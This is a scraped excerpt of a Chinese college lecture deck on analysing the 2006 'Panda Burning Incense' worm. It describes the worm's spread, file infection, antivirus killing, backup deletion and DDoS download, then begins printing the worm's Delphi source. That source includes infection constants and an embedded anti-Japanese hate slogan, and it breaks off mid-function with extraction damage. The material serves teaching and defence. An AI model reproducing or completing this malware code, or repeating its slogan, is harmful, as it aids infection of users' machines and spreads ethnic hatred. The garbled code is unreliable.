文档介绍:Virus 计算机病毒与防治计算机病毒与防治重庆电子工程职业学院计算机病毒与防治课程小组教学单元 4-4 蠕虫病毒防治熊猫烧香病毒源码分析熊猫烧香病毒特点熊猫烧香病毒行为分析第二讲熊猫烧香蠕虫病毒剖析计算机病毒与防治课程小组熊猫烧香病毒的手工清除熊猫烧香病毒特点计算机病毒与防治课程小组病毒名称熊猫烧香又称尼姆亚、武汉男生、 .、 . 病毒类型蠕虫病毒危险级别★★★★★影响系统 Win 9X/ME/NT/2000/XP/2003 熊猫烧香病毒特点计算机病毒与防治课程小组 2006 年底,我国互联网上大规模爆发“熊猫烧香”病毒及其变种,该病毒通过多种方式进行传播,同时该病毒还具有盗取用户游戏账号、 QQ账号等功能。该病毒传播速度快,危害范围广,截至案发为止,已有上百万个人用户、网吧及企业局域网用户遭受感染和破坏,引起社会各界高度关注。《瑞星 2006 安全报告》将其列为十大病毒之首,在《2006 年度中国大陆地区电脑病毒疫情和互联网安全报告》的十大病毒排行中一举成为“毒王”。熊猫烧香病毒特点计算机病毒与防治课程小组熊猫烧香一个感染型的蠕虫病毒,它能感染系统中 exe ,com , pif ,src ,html ,asp 等文件,它还能中止大量的反病毒软件进程并且会删除扩展名为 gho 的文件,该文件是一系统备份工具 GHOST 的备份文件,使用户的系统备份文件丢失。 可执行文件全部被改成熊猫举着三根香的模样。熊猫烧香病毒特点计算机病毒与防治课程小组湖北省公安厅 2007 年2月 12日宣布,根据统一部署,湖北省网监在多个省市公安机关的配合下,一举侦破了制作传播“熊猫烧香”病毒案,抓获李俊(男,25岁,武汉新洲区人)。病毒制造者熊猫烧香病毒源码分析计算机病毒与防治课程小组含有病毒体的文件被运行后,病毒将自身拷贝至系统目录,同时修改注册表将自身设置为开机启动项,并遍历各个驱动器, 将自身写入磁盘根目录下,增加一个 文件,使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染,同时开另外一个线程连接网站下载 ddos 程序进行发动恶意攻击。病毒结构主程序流程图熊猫烧香病毒源码分析计算机病毒与防治课程小组 Program japussy ;uses windows, sysutils ,classes, graphics, shellapi {,registry}; const headersize =82432; //病毒体的大小 iconoffset =$12eb8; //pe文件主图标的偏移量//查找 2800000020 的十六进制字符串可以找到主图标的偏移量{headersize =38912; //upx 压缩过病毒体的大小 iconoffset =$92bc; //upx 压缩过 pe文件主图标的偏移量}iconsize =$2e8; //pe文件主图标的大小--744 字节 icontail =iconoffset +iconsize ;//pe文件主图标的尾部 id=$44444444; //感染标记病毒文件初始信息熊猫烧香病毒源码分析计算机病毒与防治课程小组//垃圾码,以备写入 catchword ='if arace need tobekilled out, itmust beyamat o.'+'if acountry need tobedestroyed, itmust bejapan !'+ '*** ***'; {$r *.res} function registerserviceprocess(dwprocessid ,dwtype :intege r): integer; stdcall ;external ''; //函数声明 var tmpfile :string; si:startupinfo ;pi: process_information ; isjap :boolean =false; //日文操作系统标记熊猫烧香病毒源码分析计算机病毒与防治课程小组{===== 判断是否为 win9x =====} function iswin9x: boolean ; var ver :tosversioninfo ;begin result :=false; :=sizeof(tosve rsioninfo ); ifnot getversionex(ver )then exit; if( =ver_platform_win 32_windows) the